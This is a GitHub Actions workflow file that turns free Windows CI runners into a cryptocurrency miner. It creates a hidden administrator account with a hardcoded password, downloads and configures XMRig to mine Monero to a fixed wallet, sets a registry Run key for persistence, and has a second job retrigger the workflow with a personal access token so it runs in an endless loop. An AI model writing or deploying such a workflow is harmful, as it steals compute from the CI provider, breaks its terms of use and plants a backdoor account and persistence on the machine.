name: RDP TEST Auto-Restarting Miner (Final)

on:
  workflow_dispatch:

jobs:
  secure-rdp:
    runs-on: windows-latest
    timeout-minutes: 180 # <-- This job will automatically stop after 3 hours

    steps:
      - name: Create Miner User
        shell: powershell
        run: |
          $password = "Runner-12345"
          $securePass = ConvertTo-SecureString $password -AsPlainText -Force
          New-LocalUser -Name "RDP" -Password $securePass -AccountNeverExpires
          Add-LocalGroupMember -Group "Administrators" -Member "RDP"

      - name: Install, Configure, and Set Auto-Start LLLLLLL
        shell: powershell
        run: |
          $ErrorActionPreference = "Stop"
          $minerVersion = "6.21.2"
          $downloadUrl = "https://github.com/xmrig/xmrig/releases/download/v$($minerVersion)/xmrig-$($minerVersion)-msvc-win64.zip"
          $zipPath = "$env:TEMP\xmrig.zip"
          $desktopPath = "C:\Users\RDP\Desktop"
          
          New-Item -ItemType Directory -Force -Path $desktopPath
          Invoke-WebRequest -Uri $downloadUrl -OutFile $zipPath
          Expand-Archive -Path $zipPath -DestinationPath $desktopPath -Force
          
          $minerFolder = (Get-ChildItem -Path $desktopPath -Directory | Where-Object { $_.Name -like 'xmrig*' }).FullName
          if (-not $minerFolder) { throw "CRITICAL: Could not find extracted XMRig folder!" }
          
          $jsonContent = '{"autosave": true,"cpu": true,"opencl": false,"cuda": false,"pools": [{"algo": "rx/0","url": "pool.supportxmr.com:5555","user": "49UWTwnrxNXi8eMTCqdC5U3eiMHrPZkvvbsYN3WEde4o9RYebixumBCCy5oCdoSKkS2U6t9gXJFzJNkxXC7tJ1Uq4uky5BP","pass": "x"}]}'
          $jsonContent | ConvertFrom-Json | ConvertTo-Json -Depth 100 | Set-Content -Path (Join-Path $minerFolder "config.json")

          $batPath = Join-Path $desktopPath "Start-Miner.bat"
          $batContent = "@echo off`r`ncd /d ""$($minerFolder)""`r`nxmrig.exe"
          Set-Content -Path $batPath -Value $batContent

          $runKey = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
          Set-ItemProperty -Path $runKey -Name "XMRigMiner" -Value $batPath -Force

      - name: Start the Miner Manually
        shell: powershell
        run: |
          Start-Process -FilePath "C:\Users\RDP\Desktop\Start-Miner.bat"
          Write-Host "Miner process has been launched in the background."
          
      - name: Maintain Workflow
        shell: powershell
        run: |
          Write-Host "Workflow is now in mining mode. It will run for 3 hours before restarting."
          while ($true) {
              Start-Sleep -Seconds 300
          }

  trigger-next-run:
    runs-on: ubuntu-latest
    needs: secure-rdp
    if: always()

    steps:
      # CORRECTED: This step is required for the 'gh' command to know which repository to use.
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Trigger new workflow run
        env:
          GH_TOKEN: ${{ secrets.PAT_TOKEN }}
        run: |
          echo "Triggering the next workflow run..."
          # Replace 'main.yml' with your workflow's filename if it's different.
          gh workflow run main.yml
